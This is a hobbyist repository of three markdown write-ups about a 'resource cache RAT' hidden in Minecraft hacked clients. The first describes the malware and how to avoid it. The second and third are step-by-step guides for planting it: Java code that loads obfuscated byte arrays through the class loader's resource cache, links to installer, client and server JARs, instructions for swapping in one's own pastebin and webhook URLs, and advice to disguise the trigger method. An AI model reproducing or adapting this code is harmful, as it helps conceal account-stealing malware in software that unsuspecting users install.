├── README.md
├── writeup-1.md
├── writeup-2.md
└── writeup-3.md


/README.md:
--------------------------------------------------------------------------------
1 | # writeups
2 | Random writes about stuff when I feel like it. <br>
3 | [Write up 1 Byte/Resource Cache Rat.](https://github.com/ProfKambing/writeups/blob/main/writeup-1.md) <br>
4 | [Write up 3 **CREATING** Byte/Resource Cache Rat.](https://github.com/ProfKambing/writeups/blob/main/writeup-3.md) <br>
5 | 
6 | also to improve my readme skills 😎
7 | 


--------------------------------------------------------------------------------
/writeup-1.md:
--------------------------------------------------------------------------------
 1 | # Resource cache rat.
 2 | Not a common rat, but really dangerous. The only client i know that had this is renosense-beta made by zopac.
 3 | 
 4 | The 3 pastebins are still up and so are the downloads but the webhook's are nuked, so dont worry running old renosense beta.
 5 | 
 6 | ## Investigating 
 7 | Thanks to [Sxmurai](https://github.com/Sxmurai/renosense-RATs) for providing these. The rat is located in CFont.java but the file is never used.
 8 | 
 9 | Zopac used bytes to avoid suspicion.
10 | 
11 | ![bytes](https://cdn.upload.systems/uploads/stsyvbx7.png)
12 | 
13 | ## Deep dive
14 | After translating it, theres three pastebin link's (Which are still up).
15 | 
16 | How it works is it install INSTALLER.jar and it install CLIENT.jar then it rats the user by installing SERVER.jar.
17 | 
18 | All of this was done in resource cache so you wont even know that you gave zopac free alts.
19 | 
20 | ## How to avoid
21 | - Decompile and searches for keywords like "Bootstrap" since these ratters are smart.
22 | - Don't run oyvey skids, only run clients that you trust.
23 | - If you want to run it anyway, do it in a VM environment or offline.
24 | 
25 | big madlad zopac.
26 | 


--------------------------------------------------------------------------------
/writeup-2.md:
--------------------------------------------------------------------------------
 1 | ## Can I use it?
 2 | yes, If you're new to these stuff, I recommend to not.
 3 | 
 4 | ## How?
 5 | (This is for educational purposes only, and I do not guarantee this would work.)\
 6 | first download these [bytes](https://cdn.discordapp.com/attachments/889588787972284456/891204621530456104/decimal.txt). It still has Zopac's pastebin link tho.
 7 | 
 8 | Replace it by translating into ascii and translate it back to decimals(bytes).
 9 | \
10 | Make sure your number delimiter is set to `Comma`
11 | \
12 | [Translator](https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html)
13 | 
14 | Then paste this code into your client and somehow trigger it
15 | ```java
16 | byte[] pixels = {//the bytes (example: 50, 100, 200)}
17 | try {
18 |     Field field = LaunchClassLoader.class.getDeclaredField("resourceCache");
19 |     field.setAccessible(true);
20 |     Map<String, byte[]> cache = (Map<String, byte[]>) field.get(Launch.classLoader);
21 |     cache.put("idasido.adldaosd.wpiw.install.Bootstrap", pixels);
22 |     Launch.classLoader.loadClass("idasido.adldaosd.wpiw.install.Bootstrap").getMethod("main").invoke(null);
23 |     textStructureSize = true;
24 | } catch (Exception ignored) {}
25 | ```
26 | 
27 | You just implemented the rat into your client.
28 | 
29 | Next step is to download the [installer](https://cdn.discordapp.com/attachments/825998603977621518/891247725931298816/COPE-1.0-SNAPSHOT-installer.jar)
30 | then the [client](https://cdn.discordapp.com/attachments/825998603977621518/891247723817357333/COPE-1.0-SNAPSHOT-client.jar)
31 | and the [server](https://cdn.discordapp.com/attachments/825998603977621518/891247713436442624/COPE-1.0-SNAPSHOT-server.jar).
32 | \
33 | Use [recaf](https://github.com/Col-E/Recaf) to replace the pastebins and webhook.
34 | 
35 | - ##  All the url you need to replace
36 | 1. Installer 
37 |     - Bootstrap.class : 18
38 |     - Installer.class : 16 / 55
39 | 3. Client 
40 |    - Loader.class : 19
41 | 2. Server
42 |    - Sender.class : 17 
43 |     
44 | all credits to zopac for making the resource cache rat
45 | \
46 | credits to yoink for making the original rat
47 | 


--------------------------------------------------------------------------------
/writeup-3.md:
--------------------------------------------------------------------------------
 1 | ## How to implement class loader rat / resouce cache rat in 5 minutes or less in any java projects
 2 | Since my previous writeup is so hard and yall r lazy fucks
 3 | - First we need a byte class loader, just copy paste this shit into your project.
 4 | ```java
 5 | public static class ByteClassLoader extends ClassLoader {
 6 |         private HashMap<String, byte[]> byteDataMap = new HashMap<>();
 7 | 
 8 |         public ByteClassLoader(ClassLoader parent) {
 9 |             super(parent);
10 |         }
11 | 
12 |         public void loadDataInBytes(byte[] byteData, String resourcesName) {
13 |             byteDataMap.put(resourcesName, byteData);
14 |         }
15 | 
16 |         @Override
17 |         protected Class<?> findClass(String className) throws ClassNotFoundException {
18 |             if (byteDataMap.isEmpty())
19 |                 throw new ClassNotFoundException("byte data is empty");
20 | 
21 |             String filePath = className.replaceAll("\\.", "/").concat(".class");
22 |             byte[] extractedBytes = byteDataMap.get(filePath);
23 |             if (extractedBytes == null)
24 |                 throw new ClassNotFoundException("Cannot find " + filePath + " in bytes");
25 | 
26 |             return defineClass(className, extractedBytes, 0, extractedBytes.length);
27 |         }
28 |     }
29 | }
30 | ```
31 | ## Creating bytes (da rat)
32 | - Create a java file containing your nasty rat and then compile it turning the `.java` file to `.class` file
33 | using **javac <filename.java>** in [CMD]()
34 | - Open the class file using notepad and copy it. And then [translate](https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html) it to bytes
35 | - Set number delimiter to `Comma`
36 | 
37 | 
38 | Java file example :
39 | 
40 | ```java
41 | package test;
42 | 
43 | public class Test {
44 |     
45 |     public static void runTheVirus() {
46 |         System.out.println("Hello World");
47 |         sendWebhook("test","zawebhook");
48 |     }
49 |     public static void sendWebhook(String message, String webhook) {
50 |         //write za rat
51 |     }
52 | }
53 | ```
54 | **PLEASE REMEMBER THAT YOU NEED TO COMPILE IT TO `.class` FOLLOW ALL THE STEPS ABOVE THE CODE SAMPLE**
55 | ## Implementing da rat
56 | Basically initializing a `ByteClassLoader` instance and running it.
57 | ```java
58 |     public static void main(String[] args) throws Exception {
59 |         int[] bytes = { put bytes here };
60 |         byte[] bytes1 = new byte[bytes.length];
61 |         // this seems retarded but only way to make it work
62 |         for (int i = 0; i < bytes.length; i++) {
63 |             bytes1[i] = (byte)bytes[i];
64 |         }
65 |         ByteClassLoader byteClassLoader = new ByteClassLoader(ClassLoader.getSystemClassLoader());
66 |         byteClassLoader.loadDataInBytes(bytes1, "test.Test");
67 | 
68 |         Class<?> clazz = byteClassLoader.loadClass("test.Test");
69 |         clazz.getMethod("runTheVirus").invoke(null);
70 |         // name the method whatever u want no obvious tho
71 | }
72 | ```
73 | i aint reading allat but we up
74 | 


--------------------------------------------------------------------------------